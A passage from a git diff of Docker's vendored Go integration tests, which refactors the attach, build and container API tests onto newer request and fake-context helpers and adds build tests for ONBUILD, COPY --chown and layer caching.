procOpenEvent := modkernel32.NewProc("OpenEventW") - procPulseEvent := modkernel32.NewProc("PulseEvent") - - ev := "Global\\docker-daemon-" + strconv.Itoa(pid) - h2, _ := openEvent(0x0002, false, ev, procOpenEvent) - if h2 == 0 { - return - } - pulseEvent(h2, procPulseEvent) -} - -func signalDaemonReload(pid int) error { - return fmt.Errorf("daemon reload not supported") -} - -func cleanupExecRoot(c *check.C, execRoot string) { -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go index d43bf3ab0e..26633841db 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_attach_test.go @@ -4,17 +4,21 @@ import ( "bufio" "bytes" "context" + "fmt" "io" "net" "net/http" + "net/http/httputil" "strings" "time" "github.com/docker/docker/api/types" "github.com/docker/docker/client" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/stdcopy" "github.com/go-check/check" + "github.com/pkg/errors" "golang.org/x/net/websocket" ) @@ -22,7 +26,7 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { testRequires(c, DaemonIsLinux) out, _ := dockerCmd(c, "run", "-dit", "busybox", "cat") - rwc, err := sockConn(time.Duration(10*time.Second), "") + rwc, err := request.SockConn(time.Duration(10*time.Second), daemonHost()) c.Assert(err, checker.IsNil) cleanedContainerID := strings.TrimSpace(out) @@ -72,26 +76,24 @@ func (s *DockerSuite) TestGetContainersAttachWebsocket(c *check.C) { // regression gh14320 func (s *DockerSuite) TestPostContainersAttachContainerNotFound(c *check.C) { - req, client, err := newRequestClient("POST", "/containers/doesnotexist/attach", nil, "", "") + resp, _, err := request.Post("/containers/doesnotexist/attach") 
c.Assert(err, checker.IsNil) - - resp, err := client.Do(req) // connection will shutdown, err should be "persistent connection closed" - c.Assert(err, checker.NotNil) // Server shutdown connection - - body, err := readBody(resp.Body) - c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) + content, err := request.ReadBody(resp.Body) + c.Assert(err, checker.IsNil) expected := "No such container: doesnotexist\r\n" - c.Assert(string(body), checker.Equals, expected) + c.Assert(string(content), checker.Equals, expected) } func (s *DockerSuite) TestGetContainersWsAttachContainerNotFound(c *check.C) { - status, body, err := sockRequest("GET", "/containers/doesnotexist/attach/ws", nil) - c.Assert(status, checker.Equals, http.StatusNotFound) + res, body, err := request.Get("/containers/doesnotexist/attach/ws") + c.Assert(res.StatusCode, checker.Equals, http.StatusNotFound) + c.Assert(err, checker.IsNil) + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) expected := "No such container: doesnotexist" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + c.Assert(getErrorMessage(c, b), checker.Contains, expected) } func (s *DockerSuite) TestPostContainersAttach(c *check.C) { @@ -139,12 +141,12 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { cid, _ := dockerCmd(c, "run", "-di", "busybox", "cat") cid = strings.TrimSpace(cid) // Attach to the container's stdout stream. - conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err := sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Check if the data from stdout can be received. expectSuccess(conn, br, "stdout", false) // Attach to the container's stderr stream. 
- conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Since the container only emits stdout, attaching to stderr should return nothing. expectTimeout(conn, br, "stdout") @@ -152,10 +154,10 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { // Test the similar functions of the stderr stream. cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "cat >&2") cid = strings.TrimSpace(cid) - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectSuccess(conn, br, "stderr", false) - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectTimeout(conn, br, "stderr") @@ -163,29 +165,32 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { cid, _ = dockerCmd(c, "run", "-dit", "busybox", "/bin/sh", "-c", "cat >&2") cid = strings.TrimSpace(cid) // Attach to stdout only. - conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stdout=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) expectSuccess(conn, br, "stdout", true) // Attach without stdout stream. 
- conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain") + conn, br, err = sockRequestHijack("POST", "/containers/"+cid+"/attach?stream=1&stdin=1&stderr=1", nil, "text/plain", daemonHost()) c.Assert(err, checker.IsNil) // Nothing should be received because both the stdout and stderr of the container will be // sent to the client as stdout when tty is enabled. expectTimeout(conn, br, "stdout") // Test the client API - // Make sure we don't see "hello" if Logs is false client, err := client.NewEnvClient() c.Assert(err, checker.IsNil) + defer client.Close() cid, _ = dockerCmd(c, "run", "-di", "busybox", "/bin/sh", "-c", "echo hello; cat") cid = strings.TrimSpace(cid) + // Make sure we don't see "hello" if Logs is false attachOpts := types.ContainerAttachOptions{ Stream: true, Stdin: true, Stdout: true, + Stderr: true, + Logs: false, } resp, err := client.ContainerAttach(context.Background(), cid, attachOpts) @@ -203,8 +208,53 @@ func (s *DockerSuite) TestPostContainersAttach(c *check.C) { _, err = resp.Conn.Write([]byte("success")) c.Assert(err, checker.IsNil) - actualStdout := new(bytes.Buffer) - actualStderr := new(bytes.Buffer) - stdcopy.StdCopy(actualStdout, actualStderr, resp.Reader) - c.Assert(actualStdout.Bytes(), checker.DeepEquals, []byte("hello\nsuccess"), check.Commentf("Attach didn't return the expected data from stdout")) + var outBuf, errBuf bytes.Buffer + _, err = stdcopy.StdCopy(&outBuf, &errBuf, resp.Reader) + if err != nil && errors.Cause(err).(net.Error).Timeout() { + // ignore the timeout error as it is expected + err = nil + } + c.Assert(err, checker.IsNil) + c.Assert(errBuf.String(), checker.Equals, "") + c.Assert(outBuf.String(), checker.Equals, "hello\nsuccess") +} + +// SockRequestHijack creates a connection to specified host (with method, contenttype, …) and returns a hijacked connection +// and the output as a `bufio.Reader` +func sockRequestHijack(method, endpoint string, data 
io.Reader, ct string, daemon string, modifiers ...func(*http.Request)) (net.Conn, *bufio.Reader, error) { + req, client, err := newRequestClient(method, endpoint, data, ct, daemon, modifiers...) + if err != nil { + return nil, nil, err + } + + client.Do(req) + conn, br := client.Hijack() + return conn, br, nil +} + +// FIXME(vdemeester) httputil.ClientConn is deprecated, use http.Client instead (closer to actual client) +// Deprecated: Use New instead of NewRequestClient +// Deprecated: use request.Do (or Get, Delete, Post) instead +func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string, modifiers ...func(*http.Request)) (*http.Request, *httputil.ClientConn, error) { + c, err := request.SockConn(time.Duration(10*time.Second), daemon) + if err != nil { + return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) + } + + client := httputil.NewClientConn(c, nil) + + req, err := http.NewRequest(method, endpoint, data) + if err != nil { + client.Close() + return nil, nil, fmt.Errorf("could not create new request: %v", err) + } + + for _, opt := range modifiers { + opt(req) + } + + if ct != "" { + req.Header.Set("Content-Type", ct) + } + return req, client, nil } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go deleted file mode 100644 index bfcae31bd0..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go +++ /dev/null @@ -1,25 +0,0 @@ -package main - -import ( - "net/http" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// Test case for #22244 -func (s *DockerSuite) TestAuthAPI(c *check.C) { - testRequires(c, Network) - config := types.AuthConfig{ - Username: "no-user", - Password: "no-password", - } - - expected := "Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" - status, 
body, err := sockRequest("POST", "/auth", config) - c.Assert(err, check.IsNil) - c.Assert(status, check.Equals, http.StatusUnauthorized) - msg := getErrorMessage(c, body) - c.Assert(msg, checker.Contains, expected, check.Commentf("Expected: %v, got: %v", expected, msg)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go index 9b069a43a6..144acbd046 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_test.go @@ -3,44 +3,54 @@ package main import ( "archive/tar" "bytes" + "context" + "encoding/json" + "fmt" + "io" + "io/ioutil" "net/http" "regexp" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakegit" + "github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func (s *DockerSuite) TestBuildAPIDockerFileRemote(c *check.C) { testRequires(c, NotUserNamespace) + var testD string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { testD = `FROM busybox -COPY * /tmp/ RUN find / -name ba* RUN find /tmp/` } else { // -xdev is required because sysfs can cause EPERM testD = `FROM busybox -COPY * /tmp/ RUN find / -xdev -name ba* RUN find /tmp/` } - server, err := fakeStorage(map[string]string{"testD": testD}) - c.Assert(err, checker.IsNil) + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{"testD": testD})) defer server.Close() - res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+server.URL()+"/testD", nil, "application/json") + res, body, err := 
request.Post("/build?dockerfile=baz&remote="+server.URL()+"/testD", request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) // Make sure Dockerfile exists. // Make sure 'baz' doesn't exist ANYWHERE despite being mentioned in the URL out := string(buf) - c.Assert(out, checker.Contains, "/tmp/Dockerfile") + c.Assert(out, checker.Contains, "RUN find /tmp") c.Assert(out, checker.Not(checker.Contains), "baz") } @@ -64,14 +74,12 @@ func (s *DockerSuite) TestBuildAPIRemoteTarballContext(c *check.C) { // failed to close tar archive c.Assert(tw.Close(), checker.IsNil) - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, checker.IsNil) - + })) defer server.Close() - res, b, err := sockRequestRaw("POST", "/build?remote="+server.URL()+"/testT.tar", nil, "application/tar") + res, b, err := request.Post("/build?remote="+server.URL()+"/testT.tar", request.ContentType("application/tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) b.Close() @@ -113,19 +121,18 @@ RUN echo 'right' // failed to close tar archive c.Assert(tw.Close(), checker.IsNil) - server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ "testT.tar": buffer, - }) - c.Assert(err, checker.IsNil) - + })) defer server.Close() + url := "/build?dockerfile=custom&remote=" + server.URL() + "/testT.tar" - res, body, err := sockRequestRaw("POST", url, nil, "application/tar") + res, body, err := request.Post(url, request.ContentType("application/tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) defer body.Close() - content, err := readBody(body) + content, err := 
request.ReadBody(body) c.Assert(err, checker.IsNil) // Build used the wrong dockerfile. @@ -133,18 +140,17 @@ RUN echo 'right' } func (s *DockerSuite) TestBuildAPILowerDockerfile(c *check.C) { - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "dockerfile": `FROM busybox RUN echo from dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() - res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -152,21 +158,20 @@ RUN echo from dockerfile`, } func (s *DockerSuite) TestBuildAPIBuildGitWithF(c *check.C) { - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "baz": `FROM busybox RUN echo from baz`, "Dockerfile": `FROM busybox RUN echo from Dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() // Make sure it tries to 'dockerfile' query param value - res, body, err := sockRequestRaw("POST", "/build?dockerfile=baz&remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?dockerfile=baz&remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -175,21 +180,20 @@ RUN echo from Dockerfile`, func (s *DockerSuite) TestBuildAPIDoubleDockerfile(c *check.C) { testRequires(c, UnixCli) // dockerfile overwrites Dockerfile on Windows - git, err := newFakeGit("repo", map[string]string{ + git := fakegit.New(c, "repo", map[string]string{ "Dockerfile": `FROM busybox RUN echo from Dockerfile`, "dockerfile": `FROM busybox RUN echo 
from dockerfile`, }, false) - c.Assert(err, checker.IsNil) defer git.Close() // Make sure it tries to 'dockerfile' query param value - res, body, err := sockRequestRaw("POST", "/build?remote="+git.RepoURL, nil, "application/json") + res, body, err := request.Post("/build?remote="+git.RepoURL, request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - buf, err := readBody(body) + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) out := string(buf) @@ -232,11 +236,11 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { // failed to close tar archive c.Assert(tw.Close(), checker.IsNil) - res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar") + res, body, err := request.Post("/build", request.RawContent(ioutil.NopCloser(buffer)), request.ContentType("application/x-tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - out, err := readBody(body) + out, err := request.ReadBody(body) c.Assert(err, checker.IsNil) lines := strings.Split(string(out), "\n") c.Assert(len(lines), checker.GreaterThan, 1) @@ -252,3 +256,303 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { c.Assert(imageA, checker.Not(checker.Equals), imageB) } + +func (s *DockerSuite) TestBuildOnBuildWithCopy(c *check.C) { + dockerfile := ` + FROM ` + minimalBaseImage() + ` as onbuildbase + ONBUILD COPY file /file + + FROM onbuildbase + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "some content"), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(out), checker.Contains, "Successfully built") +} + +func (s 
*DockerSuite) TestBuildOnBuildCache(c *check.C) { + build := func(dockerfile string) []byte { + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) + return out + } + + dockerfile := ` + FROM ` + minimalBaseImage() + ` as onbuildbase + ENV something=bar + ONBUILD ENV foo=bar + ` + build(dockerfile) + + dockerfile += "FROM onbuildbase" + out := build(dockerfile) + + imageIDs := getImageIDsFromBuild(c, out) + assert.Check(c, is.Len(imageIDs, 2)) + parentID, childID := imageIDs[0], imageIDs[1] + + client := testEnv.APIClient() + + // check parentID is correct + image, _, err := client.ImageInspectWithRaw(context.Background(), childID) + assert.NilError(c, err) + assert.Check(c, is.Equal(parentID, image.Parent)) +} + +func (s *DockerRegistrySuite) TestBuildCopyFromForcePull(c *check.C) { + client := testEnv.APIClient() + + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + err := client.ImageTag(context.TODO(), "busybox", repoName) + assert.Check(c, err) + // push the image to the registry + rc, err := client.ImagePush(context.TODO(), repoName, types.ImagePushOptions{RegistryAuth: "{}"}) + assert.Check(c, err) + _, err = io.Copy(ioutil.Discard, rc) + assert.Check(c, err) + + dockerfile := fmt.Sprintf(` + FROM %s AS foo + RUN touch abc + FROM %s + COPY --from=foo /abc / + `, repoName, repoName) + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build?pull=1", + request.RawContent(ctx.AsTarReader(c)), + 
request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildAddRemoteNoDecompress(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + dt := []byte("contents") + err := tw.WriteHeader(&tar.Header{ + Name: "foo", + Size: int64(len(dt)), + Mode: 0600, + Typeflag: tar.TypeReg, + }) + assert.NilError(c, err) + _, err = tw.Write(dt) + assert.NilError(c, err) + err = tw.Close() + assert.NilError(c, err) + + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ + "test.tar": buffer, + })) + defer server.Close() + + dockerfile := fmt.Sprintf(` + FROM busybox + ADD %s/test.tar / + RUN [ -f test.tar ] + `, server.URL()) + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildChownOnCopy(c *check.C) { + // new feature added in 1.31 - https://github.com/moby/moby/pull/34263 + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31")) + dockerfile := `FROM busybox + RUN echo 'test1:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'test1:x:1001:' >> /etc/group + RUN echo 'test2:x:1002:' >> /etc/group + COPY --chown=test1:1002 . 
/new_dir + RUN ls -l / + RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'test1:test2' ] + RUN [ $(ls -nl / | grep new_dir | awk '{print $3":"$4}') = '1001:1002' ] + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("test_file1", "some test content"), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildCopyCacheOnFileChange(c *check.C) { + + dockerfile := `FROM busybox +COPY file /file` + + ctx1 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "foo")) + ctx2 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "bar")) + + var build = func(ctx *fakecontext.Fake) string { + res, body, err := request.Post("/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + + ids := getImageIDsFromBuild(c, out) + return ids[len(ids)-1] + } + + id1 := build(ctx1) + id2 := build(ctx1) + id3 := build(ctx2) + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + if id1 == id3 { + c.Fatal("COPY With different source file should not share same cache") + } +} + +func (s *DockerSuite) TestBuildAddCacheOnFileChange(c *check.C) { + + dockerfile := `FROM busybox +ADD file /file` + + ctx1 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "foo")) + ctx2 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + 
fakecontext.WithFile("file", "bar")) + + var build = func(ctx *fakecontext.Fake) string { + res, body, err := request.Post("/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + + ids := getImageIDsFromBuild(c, out) + return ids[len(ids)-1] + } + + id1 := build(ctx1) + id2 := build(ctx1) + id3 := build(ctx2) + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + if id1 == id3 { + c.Fatal("COPY With different source file should not share same cache") + } +} + +func (s *DockerSuite) TestBuildScratchCopy(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerfile := `FROM scratch +ADD Dockerfile / +ENV foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +type buildLine struct { + Stream string + Aux struct { + ID string + } +} + +func getImageIDsFromBuild(c *check.C, output []byte) []string { + var ids []string + for _, line := range bytes.Split(output, []byte("\n")) { + if len(line) == 0 { + continue + } + entry := buildLine{} + assert.NilError(c, json.Unmarshal(line, &entry)) + if entry.Aux.ID != "" { + ids = append(ids, entry.Aux.ID) + } + } + return ids +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go new file mode 100644 index 0000000000..a605c5be39 --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go @@ -0,0 +1,39 @@ +// +build windows + +package main + +import ( + "net/http" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func (s *DockerSuite) TestBuildWithRecycleBin(c *check.C) { + testRequires(c, DaemonIsWindows) + + dockerfile := "" + + "FROM " + testEnv.PlatformDefaults.BaseImage + "\n" + + "RUN md $REcycLE.biN && md missing\n" + + "RUN dir $Recycle.Bin && exit 1 || exit 0\n" + + "RUN dir missing\n" + + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go index d046ec0684..e8e47bd8b1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go @@ -3,16 +3,16 @@ package main import ( "archive/tar" "bytes" + "context" "encoding/json" "fmt" "io" "io/ioutil" "net/http" - "net/http/httputil" - "net/url" "os" "path/filepath" "regexp" + "runtime" "strconv" "strings" "time" @@ -21,51 +21,64 @@ import ( containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" networktypes "github.com/docker/docker/api/types/network" - 
"github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" ) func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) { - startCount, err := getContainerCount() - c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count")) - + startCount := getContainerCount(c) name := "getall" dockerCmd(c, "run", "--name", name, "busybox", "true") - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var inspectJSON []struct { - Names []string + options := types.ContainerListOptions{ + All: true, } - err = json.Unmarshal(body, &inspectJSON) - c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body")) - - c.Assert(inspectJSON, checker.HasLen, startCount+1) - - actual := inspectJSON[0].Names[0] + containers, err := cli.ContainerList(context.Background(), options) + c.Assert(err, checker.IsNil) + c.Assert(containers, checker.HasLen, startCount+1) + actual := containers[0].Names[0] c.Assert(actual, checker.Equals, "/"+name) } // regression test for empty json field being omitted #13691 func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { + startCount := getContainerCount(c) dockerCmd(c, "run", "busybox", "true") - status, body, err := sockRequest("GET", 
"/containers/json?all=1", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ContainerListOptions{ + All: true, + } + containers, err := cli.ContainerList(context.Background(), options) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(containers, checker.HasLen, startCount+1) + actual := fmt.Sprintf("%+v", containers[0]) // empty Labels field triggered this bug, make sense to check for everything // cause even Ports for instance can trigger this bug // better safe than sorry.. fields := []string{ - "Id", + "ID", "Names", "Image", "Command", @@ -79,7 +92,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { // decoding into types.Container do not work since it eventually unmarshal // and empty field to an empty go map, so we just check for a string for _, f := range fields { - if !strings.Contains(string(body), f) { + if !strings.Contains(actual, f) { c.Fatalf("Field %s is missing and it shouldn't", f) } } @@ -87,7 +100,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { type containerPs struct { Names []string - Ports []map[string]interface{} + Ports []types.Port } // regression test for non-empty fields from #13901 @@ -98,30 +111,30 @@ func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) { port := 80 runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port)) - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var resp []containerPs - err = json.Unmarshal(body, &resp) + options := types.ContainerListOptions{ + All: true, + } + containers, err := cli.ContainerList(context.Background(), options) c.Assert(err, checker.IsNil) - - var foundContainer *containerPs - for _, container := range resp { - for _, testName := range container.Names 
